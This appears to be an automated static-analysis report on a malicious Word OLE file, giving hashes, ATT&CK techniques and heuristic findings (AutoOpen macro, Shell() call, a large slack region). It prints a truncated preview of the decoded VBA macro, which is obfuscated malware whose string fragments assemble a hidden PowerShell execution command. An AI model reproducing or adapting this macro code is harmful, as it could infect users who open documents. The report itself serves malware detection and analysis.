Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 915c4395dd91dee8…

MALICIOUS

Office (OLE)

Size: 147.0 KB
Created: 2018-06-22 11:38:00
Authoring application: Microsoft Office Word
First seen: 2019-09-30
MD5: 1abe3aadcd9dadbd4984124e9c1be915
SHA-1: bd706ec62ba2a9fefe85f2cdf3f74f0a81f850f5
SHA-256: 915c4395dd91dee81b742dc0aa31b9c3a3160ab491c7cf93717ecd8add9da09f
Risk Score: 182

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File

The sample contains a legacy WordBasic AutoOpen macro, which is a strong indicator of malicious intent. The presence of a Shell() call within the VBA code suggests that the macro is designed to execute arbitrary commands, likely to download and run a second-stage payload. The large slack space in the OLE structure is also a common evasion technique.

Heuristics 6

  • VBA macros detected (severity: medium; 2 related findings) OLE_VBA_MACROS
    Document contains VBA macro code.
  • Shell() call in VBA (severity: critical) OLE_VBA_SHELL
    Shell() call in VBA.
  • AutoOpen macro (severity: high) OLE_VBA_AUTOOPEN
    AutoOpen macro.
  • OLE document has large unaccounted-for region (severity: high) OLE_SLACK_ANOMALY
    OLE file is 150,528 bytes but its declared streams total only 35,038 bytes: 115,490 bytes (77%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • Legacy WordBasic auto-exec macro marker (severity: medium) OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (severity: info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename     Kind        Source                                               Size
macros.bas   vba-macro   oletools.olevba.extract_macros (decoded VBA source)  29096 bytes
SHA-256: 4e6a8019c24bb5919b1c33186abd7ce56f1276873c53351e0cd473fc5f33865c
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "HmCNbzNhIiW"
Function qAHwXkaRw()
On Error Resume Next
pwXJGz = (zRQCj * 74759 + 18002 * CInt(XqWbpl - CDbl(8601)) * 63195 * Oct(7362))
CwioM = "Hel" + "l  " + ".(" + " $" + "veR" + "bo" + "SE"
CClRKL = (MMRCLc * 5034 + 57278 * CInt(JTzvk - CDbl(37345)) * 23569 * Oct(44913))
ENlqEBiIw = "pr" + "EF" + "er" + "eN"
ZKnlsk = (TYDzo * 66552 + 13824 * CInt(FXZrt - CDbl(22267)) * 26245 * Oct(39199))
sUkbTR = "Ce." + "tO" + "sTR"
cckjIA = (qNlkAJ * 50919 + 38992 * CInt(krDwjZ - CDbl(51941)) * 24348 * Oct(83927))
SPXzAPIl = "inG" + "()" + "[1," + "3]+"
qAHwXkaRw = CwioM + ENlqEBiIw + sUkbTR + SPXzAPIl
NtUdUM = (pJQzhL * 47611 + 39353 * CInt(awWEv - CDbl(94459)) * 10823 * Oct(21158))
End Function
Function OknAlmWFT()
On Error Resume Next
TJVRD = (XsRmp * 42554 + 68655 * CInt(XKTRD - CDbl(63272)) * 6392 * Oct(62094))
MfmJiLHVvrJ = "'x" + "'-" + "jOI" + "n'" + "')(" + " [" + "st"
iawipm = (QnJVAC * 40141 + 47523 * CInt(Ocptl - CDbl(59102)) * 70156 * Oct(82232))
NsEmWXSqjXr = "RI" + "ng" + "]:"
wucjBi = (nfrrE * 44654 + 65963 * CInt(XWBMO - CDbl(33351)) * 41892 * Oct(79393))
NzlBR = ":J" + "Oin" + "( '" + "' " + ", (" + " '3"
KoENmt = (pHwqsS * 69191 + 73467 * CInt(QNXdhB - CDbl(84168)) * 87907 * Oct(69196))
LrjwdKTsdsz = "7M9" + "8s6" + "6U" + "99"
PcXcN = (FhVMZr * 1630 + 73146 * CInt(BwYrNE - CDbl(74661)) * 30070 * Oct(64376))
PvZkfV = "P10" + "9k" + "96s" + "33" + "M6" + "0_3"
EwLNJz = (dPdWR * 60033 + 71467 * CInt(mlOZG - CDbl(48707)) * 23408 * Oct(71377))
zOCHzFH = "3t" + "11" + "1e" + "100" + "e1" + "18M" + "44_"
OknAlmWFT = MfmJiLHVvrJ + NsEmWXSqjXr + NzlBR + LrjwdKTsdsz + PvZkfV + zOCHzFH
jETCWS = (NqfJit * 37971 + 22353 * CInt(ONkIU - CDbl(68540)) * 33935 * Oct(75150))
End Function
Function RuUhMFatIX()
On Error Resume Next
aSYqbY = (NYhFdJ * 14043 + 95555 * CInt(JbAbi - CDbl(85932)) * 34447 * Oct(6128))
IwAiqcjph = "110" + "k9" + "9U" + "10" + "7s" + "10" + "0s9"
sMbdS = (mjXvzE * 44400 + 28557 * CInt(RRVmG - CDbl(72897)) * 9507 * Oct(11449))
hibCVnVA = "8e" + "117" + "_3" + "3s1" + "15" + "e96" + "_1"
GKIRLv = (AUjjMQ * 70158 + 13321 * CInt(SzlLwz - CDbl(73980)) * 24534 * Oct(87304))
fCpzrWwFUS = "11M" + "10" + "1_1" + "10k" + "10" + "8t5"
RXfwX = (GnWHoV * 40473 + 55086 * CInt(wjqfu - CDbl(758)) * 62661 * Oct(27154))
GOPfL = "8k" + "37_" + "87>" + "71"
ooTup = (YvYBd * 19943 + 41359 * CInt(IwGcN - CDbl(99744)) * 92795 * Oct(93817))
lmYrRFBD = "U1" + "16" + "U7" + "0M" + "96M"
IzzOvh = (JlJdIj * 37159 + 22196 * CInt(NitzTz - CDbl(6846)) * 55878 * Oct(21484))
PIVjA = "33t" + "60" + "_33" + "P1" + "11c"
joXSOF = (MLzpuc * 26928 + 48556 * CInt(sArQYc - CDbl(89496)) * 57803 * Oct(186))
jrcHRcV = "10" + "0s1" + "18" + "t44" + ">1"
RuUhMFatIX = IwAiqcjph + hibCVnVA + fCpzrWwFUS + GOPfL + lmYrRFBD + PIVjA + jrcHRcV
DzIJt = (CNwKm * 35547 + 90911 * CInt(QWIOJ - CDbl(36313)) * 11064 * Oct(59941))
End Function
Function HXqoFjPtPRH()
On Error Resume Next
cGClv = (GttSw * 4830 + 84895 * CInt(BDSrP - CDbl(30599)) * 28671 * Oct(8793))
vTOqz = "10P" + "99e" + "10" + "7_"
FUzCU = (UhLXbf * 4594 + 83020 * CInt(HDrQtz - CDbl(96758)) * 41178 * Oct(47001))
CWJdjIf = "10" + "0P9" + "8t1" + "17P" + "33" + "t8"
GLqaq = (JYhzQ * 91721 + 14054 * CInt(NYlliQ - CDbl(48129)) * 99073 * Oct(23258))
IufhKwiscQj = "2U" + "120" + "M1"
kMYwLZ = (wbjOV * 56582 + 12105 * CInt(ISHVu - CDbl(39614)) * 23196 * Oct(92836))
npjoC = "14" + "P11" + "7M" + "10" + "0P"
CUOMq = (tGzJq * 57556 + 83098 * CInt(MHpSU - CDbl(45111)) * 43510 * Oct(86148))
YInRvC = "10" + "8t4" + "7c" + "79c" + "100" + "k11"
HXqoFjPtPRH = vTOqz + CWJdjIf + IufhKwiscQj + npjoC + YInRvC
fPVwRi = (MYPRv * 82800 + 22212 * CInt(HTqIVT - CDbl(29959)) * 83779 * Oct(33558))
End Function
Function lkKsdIBWO()
On Error Resume Next
uNECr = (jJYjw * 40172 + 17719 * CInt(cjzSOZ - CDbl(28283)) * 42070 * Oct(91820))
ISfjH = "7>4" + "7U8" + "6e1" + "00M"
KBjOWc = (YEqXQ * 26789 + 19613 * CInt(rhmScz - CDbl(74915)) * 19418 * Oct(29031))
cqEcYzWXus = "99k" + "66" + "_10"
oWzdrs = (SIrpr * 41043 + 74920 * CInt(TYQSDL - C
... (truncated)